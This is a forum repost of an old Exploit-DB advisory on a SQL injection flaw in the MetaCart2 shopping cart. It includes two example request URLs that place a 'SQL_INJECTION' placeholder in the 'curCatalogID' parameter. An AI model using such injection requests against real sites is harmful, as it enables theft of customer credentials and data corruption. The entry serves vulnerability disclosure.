Exploit MetaCart2 - 'CurCatalogID' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25541
Проверка EDB
  1. Пройдено
Автор
DCRAB
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2005-04-26
Код:
source: https://www.securityfocus.com/bid/13384/info

A remote SQL injection vulnerability affects MetaCart2. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries.

An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft sensitive information, potentially including authentication credentials, and data corruption.

http://www.example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID='SQL_INJECTION&amp%3bstrSubCatalog_NAME=Laptops
http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=%27SQL_INJECTION&amp%3bstrSubCatalog_NAME=Laptops
 
Источник
www.exploit-db.com

Похожие темы